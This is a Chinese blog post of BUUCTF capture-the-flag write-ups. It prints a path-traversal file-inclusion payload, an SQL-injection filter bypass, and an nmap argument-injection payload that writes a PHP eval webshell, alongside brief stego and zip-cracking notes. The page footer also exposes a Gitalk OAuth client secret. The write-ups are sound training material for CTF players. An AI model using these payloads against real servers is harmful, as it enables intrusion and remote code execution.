<!DOCTYPE html>
<html>

<head><meta name="generator" content="Hexo 3.9.0">
  
  <title>BUUCTF-WP - Cupid&#39;s Blog</title>
  <meta charset="UTF-8">
  <meta name="description" content="a new ctfer&#39;s study">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  
  

  <link rel="shortcut icon" href="/images/4023.gif" type="image/png">
  <meta name="description" content="Web部分1.[HCTF 2018]WarmUp&amp;emsp;&amp;emsp;进入页面后是一个大大的滑稽，查看源代码，提示了一个source.php，打开发现是php代码审计。代码如下">
<meta property="og:type" content="article">
<meta property="og:title" content="BUUCTF-WP">
<meta property="og:url" content="http://yoursite.com/2019/11/22/BUUCTF-WP/index.html">
<meta property="og:site_name" content="Cupid&#39;s Blog">
<meta property="og:description" content="Web部分1.[HCTF 2018]WarmUp&amp;emsp;&amp;emsp;进入页面后是一个大大的滑稽，查看源代码，提示了一个source.php，打开发现是php代码审计。代码如下">
<meta property="og:locale" content="default">
<meta property="og:updated_time" content="2020-01-03T02:27:46.582Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="BUUCTF-WP">
<meta name="twitter:description" content="Web部分1.[HCTF 2018]WarmUp&amp;emsp;&amp;emsp;进入页面后是一个大大的滑稽，查看源代码，提示了一个source.php，打开发现是php代码审计。代码如下">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/mdui@0.4.3/dist/css/mdui.min.css">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@9.15.8/styles/atom-one-dark.css">
  
  
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1038733_0xvrvpg9c0r.css">
  <link rel="stylesheet" href="/css/style.css?v=1578104895224">
</head>

<body class="mdui-drawer-body-left">
  
  <div id="nexmoe-background">
    <div class="nexmoe-bg" style="background-image: url(http://p0.ssl.cdn.btime.com/t01cd55c4b5ab3036c2.jpg#是博客的背景，又是文章默认头图)"></div>
    <div class="mdui-appbar mdui-shadow-0">
      <div class="mdui-toolbar">
        <a mdui-drawer="{target: '#drawer', swipe: true}" title="menu" class="mdui-btn mdui-btn-icon"><i class="mdui-icon material-icons">menu</i></a>
        <div class="mdui-toolbar-spacer"></div>
        <!--<a href="javascript:;" class="mdui-btn mdui-btn-icon"><i class="mdui-icon material-icons">search</i></a>-->
        <a href="/" title="Cupid" class="mdui-btn mdui-btn-icon"><img src="/images/namei.png"></a>
       </div>
    </div>
  </div>
  <div id="nexmoe-header">
      <div class="nexmoe-drawer mdui-drawer" id="drawer">
    <div class="nexmoe-avatar mdui-ripple">
        <a href="/" title="Cupid">
            <img src="/images/namei.png" alt="Cupid">
        </a>
    </div>
    <div class="nexmoe-count">
        <div><span>Articles</span>61</div>
        <div><span>Tags</span>0</div>
        <div><span>Categories</span>4</div>
    </div>
    <ul class="nexmoe-list mdui-list" mdui-collapse="{accordion: true}">
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple" href="/" title="回到首页">
            <i class="mdui-list-item-icon nexmoefont icon-home"></i>
            <div class="mdui-list-item-content">
                回到首页
            </div>
        </a>
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple" href="/about.html" title="关于博客">
            <i class="mdui-list-item-icon nexmoefont icon-info-circle"></i>
            <div class="mdui-list-item-content">
                关于博客
            </div>
        </a>
        
        <a class="nexmoe-list-item mdui-list-item mdui-ripple" href="/PY.html" title="我的朋友">
            <i class="mdui-list-item-icon nexmoefont icon-unorderedlist"></i>
            <div class="mdui-list-item-content">
                我的朋友
            </div>
        </a>
        
    </ul>
    <aside id="nexmoe-sidebar">
  
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">Social</h3>
    <div class="nexmoe-widget nexmoe-social">
        <a class="mdui-ripple" href="https://space.bilibili.com/23290461" target="_blank" mdui-tooltip="{content: '哔哩哔哩'}" style="color: rgb(231, 106, 141);background-color: rgba(231, 106, 141, .15);">
            <i class="nexmoefont icon-bilibili"></i>
        </a><a class="mdui-ripple" href="https://github.com/bephplover" target="_blank" mdui-tooltip="{content: 'GitHub'}" style="color: rgb(25, 23, 23);background-color: rgba(25, 23, 23, .15);">
            <i class="nexmoefont icon-github"></i>
        </a>
    </div>
</div>
  
  
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">Categories</h3>
    <div class="nexmoe-widget">

      <ul class="category-list">

        


        

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/CTF/">CTF</a>
          <span class="category-list-count">4</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/Web漏洞/">Web漏洞</a>
          <span class="category-list-count">3</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/密码学/">密码学</a>
          <span class="category-list-count">1</span>
        </li>

        

        <li class="category-list-item">
          <a class="category-list-link" href="/categories/编程类/">编程类</a>
          <span class="category-list-count">3</span>
        </li>

        
      </ul>

    </div>
  </div>


  
  
  
  
  <div class="nexmoe-widget-wrap">
    <h3 class="nexmoe-widget-title">Archive</h3>
    <div class="nexmoe-widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/12/">December 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/11/">November 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/10/">October 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/09/">September 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/08/">August 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/07/">July 2019</a></li></ul>
    </div>
  </div>


  
</aside>
    <div class="nexmoe-copyright">
        &copy; 2020 Cupid
        Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
        & <a href="https://nexmoe.com/hexo-theme-nexmoe.html" target="_blank">Nexmoe</a>
    </div>
</div><!-- .nexmoe-drawer -->
  </div>
  <div id="nexmoe-content">
    <div class="nexmoe-primary">
        <div class="nexmoe-post">
    <div class="nexmoe-post-cover"> 
        
        <img src="https://cdn.jsdelivr.net/gh/suikastar/suikastar.github.io@latest/images/classroom.jpg">
        
        <h1>BUUCTF-WP</h1>
    </div>
  <div class="nexmoe-post-meta">
    <a><i class="nexmoefont icon-calendar-fill"></i>2019年11月22日</a>
    <a><i class="nexmoefont icon-areachart"></i>1.7k 字</a>
    <a><i class="nexmoefont icon-time-circle-fill"></i>大概 7 分钟</a>
    
      <a class="nexmoefont icon-appstore-fill -link" href="/categories/CTF/">CTF</a>
    
    
  </div>
  <article>
    <h1 id="Web部分"><a href="#Web部分" class="headerlink" title="Web部分"></a>Web部分</h1><p>1.[HCTF 2018]WarmUp<br>&emsp;&emsp;进入页面后是一个大大的滑稽，查看源代码，提示了一个source.php，打开发现是php代码审计。代码如下<a id="more"></a>：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line"> <span class="php"><span class="meta">&lt;?php</span></span></span><br><span class="line"><span class="php">    highlight_file(<span class="keyword">__FILE__</span>);</span></span><br><span class="line"><span class="php">    <span class="class"><span class="keyword">class</span> <span class="title">emmm</span></span></span></span><br><span class="line"><span class="php">    &#123;</span></span><br><span class="line"><span class="php">        <span class="keyword">public</span> <span class="keyword">static</span> <span class="function"><span class="keyword">function</span> <span class="title">checkFile</span><span class="params">(&amp;$page)</span></span></span></span><br><span class="line"><span class="php">        &#123;</span></span><br><span class="line"><span class="php">            $whitelist = [<span class="string">"source"</span>=&gt;<span class="string">"source.php"</span>,<span class="string">"hint"</span>=&gt;<span class="string">"hint.php"</span>];</span></span><br><span class="line"><span class="php">            <span class="keyword">if</span> (! <span class="keyword">isset</span>($page) || !is_string($page)) &#123;</span></span><br><span class="line"><span class="php">                <span class="keyword">echo</span> <span class="string">"you can't see it"</span>;</span></span><br><span class="line"><span class="php">                <span class="keyword">return</span> <span class="keyword">false</span>;</span></span><br><span class="line"><span class="php">            &#125;</span></span><br><span class="line"><span class="php"></span></span><br><span class="line"><span class="php">            <span class="keyword">if</span> (in_array($page, $whitelist)) &#123;</span></span><br><span class="line"><span class="php">                <span class="keyword">return</span> <span class="keyword">true</span>;</span></span><br><span class="line"><span class="php">            &#125;</span></span><br><span class="line"><span class="php"></span></span><br><span class="line"><span class="php">            $_page = mb_substr(</span></span><br><span class="line"><span class="php">                $page,</span></span><br><span class="line"><span class="php">                <span class="number">0</span>,</span></span><br><span class="line"><span class="php">                mb_strpos($page . <span class="string">'?'</span>, <span class="string">'?'</span>)</span></span><br><span class="line"><span class="php">            );</span></span><br><span class="line"><span class="php">            <span class="keyword">if</span> (in_array($_page, $whitelist)) &#123;</span></span><br><span class="line"><span class="php">                <span class="keyword">return</span> <span class="keyword">true</span>;</span></span><br><span class="line"><span class="php">            &#125;</span></span><br><span class="line"><span class="php"></span></span><br><span class="line"><span class="php">            $_page = urldecode($page);</span></span><br><span class="line"><span class="php">            $_page = mb_substr(</span></span><br><span class="line"><span class="php">                $_page,</span></span><br><span class="line"><span class="php">                <span class="number">0</span>,</span></span><br><span class="line"><span class="php">                mb_strpos($_page . <span class="string">'?'</span>, <span class="string">'?'</span>)</span></span><br><span class="line"><span class="php">            );</span></span><br><span class="line"><span class="php">            <span class="keyword">if</span> (in_array($_page, $whitelist)) &#123;</span></span><br><span class="line"><span class="php">                <span class="keyword">return</span> <span class="keyword">true</span>;</span></span><br><span class="line"><span class="php">            &#125;</span></span><br><span class="line"><span class="php">            <span class="keyword">echo</span> <span class="string">"you can't see it"</span>;</span></span><br><span class="line"><span class="php">            <span class="keyword">return</span> <span class="keyword">false</span>;</span></span><br><span class="line"><span class="php">        &#125;</span></span><br><span class="line"><span class="php">    &#125;</span></span><br><span class="line"><span class="php"></span></span><br><span class="line"><span class="php">    <span class="keyword">if</span> (! <span class="keyword">empty</span>($_REQUEST[<span class="string">'file'</span>])</span></span><br><span class="line"><span class="php">        &amp;&amp; is_string($_REQUEST[<span class="string">'file'</span>])</span></span><br><span class="line"><span class="php">        &amp;&amp; emmm::checkFile($_REQUEST[<span class="string">'file'</span>])</span></span><br><span class="line"><span class="php">    ) &#123;</span></span><br><span class="line"><span class="php">        <span class="keyword">include</span> $_REQUEST[<span class="string">'file'</span>];</span></span><br><span class="line"><span class="php">        <span class="keyword">exit</span>;</span></span><br><span class="line"><span class="php">    &#125; <span class="keyword">else</span> &#123;</span></span><br><span class="line"><span class="php">        <span class="keyword">echo</span> <span class="string">"&lt;br&gt;&lt;img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" /&gt;"</span>;</span></span><br><span class="line"><span class="php">    &#125;  </span></span><br><span class="line"><span class="php"><span class="meta">?&gt;</span></span></span><br></pre></td></tr></table></figure>

<p>阅读上面代码可知可以request方式传递一个file参数，并且这个file参数需要携带whilelist数组中的hint.php或者是source.php并且用了substr函数进行截取判断也就是如果传入的file中带有？那么？前面的内容必须带有hint.php或者是source.php。到这里先停一下，这个页面是source.php,我们看一下hint.php的内容，有了提示：flag not here, and flag in ffffllllaaaagggg。也就是flag是在ffffllllaaaagggg下面。对于这个应该是个目录，那么这个目录又在哪个目录下呢，这里的源代码中直接把用户可控参数file给include了，也就是文件包含漏洞，那么可以访问到任意目录，构造</p>
<figure class="highlight gradle"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload:?<span class="keyword">file</span>=hint.php?<span class="regexp">/../</span>..<span class="regexp">/../</span>..<span class="regexp">/../</span>ffffllllaaaagggg</span><br></pre></td></tr></table></figure>

<p>最后拿下flag.<br>这里采用/../进行目录穿越，../可以回到上一个目录，正好？截取掉前面的内容满足条件，可以include进来，就去到了flag目录下。</p>
<p>2.随便注入<br>在输入一些关键字后提示：return preg_match(“/select|update|delete|drop|insert|where|./i”,$inject);这里在关键词中间添加/**/注释符进行绕过,实测用**就够了</p>
<figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1 un*<span class="strong">*ion se*</span><span class="strong">*lect 1,group_concat(table_name) fr*</span><span class="strong">*om information_schema.tables</span></span><br><span class="line"><span class="strong">whe*</span><span class="strong">*re database()="hahahah"#</span></span><br></pre></td></tr></table></figure>

<p>和显然，上面这一句过滤规则不管我怎么绕过，都不能产生出这些关键字，也就是完全不能用了。<br>补充一下，读表的语句是1’;show columns from <code>1919810931114514</code>; # 博主用的markdown自动把<code>符号转码了。对以数字为表名的表进行操作时，需要加上</code>“符号</p>
<p>3.Online Tool</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="php"><span class="meta">&lt;?php</span></span></span><br><span class="line"><span class="php"></span></span><br><span class="line"><span class="php"><span class="keyword">if</span> (<span class="keyword">isset</span>($_SERVER[<span class="string">'HTTP_X_FORWARDED_FOR'</span>])) &#123;</span></span><br><span class="line"><span class="php">    $_SERVER[<span class="string">'REMOTE_ADDR'</span>] = $_SERVER[<span class="string">'HTTP_X_FORWARDED_FOR'</span>];</span></span><br><span class="line"><span class="php">&#125;</span></span><br><span class="line"><span class="php"></span></span><br><span class="line"><span class="php"><span class="keyword">if</span>(!<span class="keyword">isset</span>($_GET[<span class="string">'host'</span>])) &#123;</span></span><br><span class="line"><span class="php">    highlight_file(<span class="keyword">__FILE__</span>);</span></span><br><span class="line"><span class="php">&#125; <span class="keyword">else</span> &#123;</span></span><br><span class="line"><span class="php">    $host = $_GET[<span class="string">'host'</span>];</span></span><br><span class="line"><span class="php">    $host = escapeshellarg($host);</span></span><br><span class="line"><span class="php">    $host = escapeshellcmd($host);</span></span><br><span class="line"><span class="php">    $sandbox = md5(<span class="string">"glzjin"</span>. $_SERVER[<span class="string">'REMOTE_ADDR'</span>]);</span></span><br><span class="line"><span class="php">    <span class="keyword">echo</span> <span class="string">'you are in sandbox '</span>.$sandbox;</span></span><br><span class="line"><span class="php">    @mkdir($sandbox);</span></span><br><span class="line"><span class="php">    chdir($sandbox);</span></span><br><span class="line"><span class="php">    <span class="keyword">echo</span> system(<span class="string">"nmap -T5 -sT -Pn --host-timeout 2 -F "</span>.$host);</span></span><br><span class="line"><span class="php">&#125;</span></span><br></pre></td></tr></table></figure>

<p>&emsp;&emsp;进入页面后直接是代码审计，这道题标签是PHP和RCE，也就是要构造RCE，第一个判断条件是设置了XXF的话，就把XXF的值赋给$_SERVER[‘REMOTE_ADDR’]。接下来是没有设置get传递Host的话，就显示出本文代码，下面是设置了get的host话，就进行两次防范与过滤处理，接下来先重点了解一下这两个函数：<br>escapeshellarg以及escapeshellcmd,在这里我们先不用百度，我们在本地测试它究竟做了些什么。测试代码：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$host</span> = <span class="variable">$_GET</span>[<span class="string">'host'</span>];</span><br><span class="line">    <span class="built_in">echo</span> <span class="variable">$host</span>.<span class="string">"&lt;br&gt;"</span>;</span><br><span class="line">    <span class="variable">$host</span> = escapeshellarg(<span class="variable">$host</span>);</span><br><span class="line">    <span class="built_in">echo</span> <span class="variable">$host</span>.<span class="string">"&lt;br&gt;"</span>;</span><br><span class="line">    <span class="variable">$host</span> = escapeshellcmd(<span class="variable">$host</span>);</span><br><span class="line">    <span class="built_in">echo</span> <span class="variable">$host</span>.<span class="string">"&lt;br&gt;"</span>;</span><br></pre></td></tr></table></figure>

<p>&emsp;&emsp;首先在没有输入host的情况下，屏幕输出了””以及^”^”,可以看到arg应当是做了加双引号处理，而cmd又在双引号前面加上了^处理。现在我们输出host=1.同上面没有输入的时候，过滤机制一样，接下来我们在测试语句下面加上system($host);这样我们用phpinfo函数来测试，试图绕过其过滤机制，最后被两次处理的phpinfo()变成了-&gt;^”phpinfo^(^)^”,我们加上’来试试能否闭合”,当我们在phpinfo()后面再加上双引号后，又多了很多^符号，这说明escapeshellcmd命令可以用来处理引号，无论单引号还是双引号都加上^符号来过滤。尝试了很多次发现有问题，我们回到原题，原题的system中是采用的””.$host故这里我们改写system的内容，也这样写，然后再尝试绕过。这里尝试后发现前面引号是单独闭合的，故只输出来看清楚过滤规则，如下所示：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$host</span> = <span class="variable">$_GET</span>[<span class="string">'host'</span>];</span><br><span class="line">    <span class="built_in">echo</span> <span class="variable">$host</span>.<span class="string">"&lt;br&gt;"</span>;</span><br><span class="line">    <span class="variable">$host</span> = escapeshellarg(<span class="variable">$host</span>);</span><br><span class="line">    <span class="built_in">echo</span> <span class="variable">$host</span>.<span class="string">"&lt;br&gt;"</span>;</span><br><span class="line">    <span class="variable">$host</span> = escapeshellcmd(<span class="variable">$host</span>);</span><br><span class="line">    <span class="built_in">echo</span> <span class="variable">$host</span>.<span class="string">"&lt;br&gt;"</span>;</span><br><span class="line">	system(<span class="variable">$host</span>);</span><br><span class="line">	<span class="built_in">echo</span> <span class="string">"\"1\"<span class="variable">$host</span>"</span>;</span><br></pre></td></tr></table></figure>

<p>&emsp;&emsp;在疑惑为什么转义是^,然后^怎么绕时，最后询问了笑师傅，最后才知道这两个函数在Linux下转义才是\而在windows下是^.我就说。。这让我怎么绕嘛。于是去Centos下试试。<br>在Centos下我发现了一个有趣的东西，那就是\在命令行中几乎不起作用，也就是说这道题我们闭合了’后，其余转义的\根本就不需要管了，我们的RCE依旧在LINUX下可以执行，故构造payload写入一句话木马：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">'<span class="php"><span class="meta">&lt;?php</span> <span class="keyword">eval</span>($_POST[<span class="string">"a"</span>]);<span class="meta">?&gt;</span></span> -oG 1.php '</span><br></pre></td></tr></table></figure>

<p>&emsp;&emsp;这里还利用了nmap的 -oG选项，可以实现将命令和结果写到文件，这样就把一句话木马写到1.php下了，由于mkdir函数我们还知道了文件存放的目录，故接着用菜刀连接我们上传的一句话文件就可以了。<br>注意猜到连接时地址填写格式：http:网站域名/mkdir()产生目录/1.php 这样就可以成功连接上了，然后在根目录下就拿到了flag.</p>
<p>&emsp;&emsp;这里也可以看出上传漏洞是很难利用的，因为最重要的得知道上传后的文件存放路径，这道题是告诉了的，但其他安全的网站肯定会藏到你根本找不到的地方，并且现在最新的技术，可以创造反向服务器，也就是在真正的服务器前给出虚拟服务器，存放的路径也都是虚拟的，因而很难实现上传漏洞。当然这只是理论上的，总有大佬很easy的解决这个过渡问题。</p>
<p>#Misc部分#<br>签到题就不说了，直接粘贴</p>
<p>1.金三胖<br>&emsp;&emsp;这个题有意思啊，三胖的标准鼓掌表情包，送到Stegslove.jar里面把他分成一张张图片来看，即可发现flag.</p>
<p>2.二维码<br>&emsp;&emsp;下载后看到是一张二维码，没有扫，先试试formost，然后发现藏了一个zip文件，密码是4位数字，用AARP暴力破解密码，拿到flag,这里注意哈，题目提示了要改为flag格式，我傻愣愣的以为这是个假flag,又去分析二维码，后来看提示才发现，直接把拿到的CTF改为flag即正确了。</p>

  </article>
  
    
<div class="nexmoe-post-copyright">
<i class="mdui-list-item-icon nexmoefont icon-info-circle"></i>
<strong>Author：</strong>Cupid<br>
<strong>Link：</strong><a href="http://yoursite.com/2019/11/22/BUUCTF-WP/" title="http://yoursite.com/2019/11/22/BUUCTF-WP/" target="_blank" rel="noopener">http://yoursite.com/2019/11/22/BUUCTF-WP/</a><br>

  <strong>版权声明：</strong>本文采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/cn/deed.zh" target="_blank">CC BY-NC-SA 3.0 CN</a> 协议进行许可

</div>


  
  <section class="nexmoe-comment">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1.5.0/dist/gitalk.min.css">
<div id="gitalk"></div>
<script src="https://cdn.jsdelivr.net/npm/gitalk@1.5.0/dist/gitalk.min.js"></script>
<script type="text/javascript">
    var gitalk = new Gitalk({
        clientID: '80b2453b6d5f37ad6225',
        clientSecret: '43e99fa852795c9a7b3eb924b2558c64b84bbdeb',
        id: window.location.pathname,
        repo: 'nexmoe.github.io',
        owner: 'nexmoe',
        admin: 'nexmoe'
    })
    gitalk.render('gitalk')
</script>
</section>
</div>
    </div>
  </div>
  <script src="https://cdn.jsdelivr.net/npm/mdui@0.4.3/dist/js/mdui.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js"></script>


 
    <script src="https://cdn.jsdelivr.net/npm/smoothscroll-for-websites@1.4.9/SmoothScroll.min.js"></script>


<script src="https://cdn.jsdelivr.net/gh/highlightjs/cdn-release@9.15.8/build/highlight.min.js"></script>
<script>hljs.initHighlightingOnLoad();</script>

<script src="/js/app.js?v=1578104895290"></script>
<script src="https://cdn.jsdelivr.net/npm/lazysizes@5.1.0/lazysizes.min.js"></script>


    <script type="text/javascript" src="https://cdn.jsdelivr.net/gh/xtaodada/xtaodada.github.io@0.0.2/copy.js"></script>



  





</body>

</html>
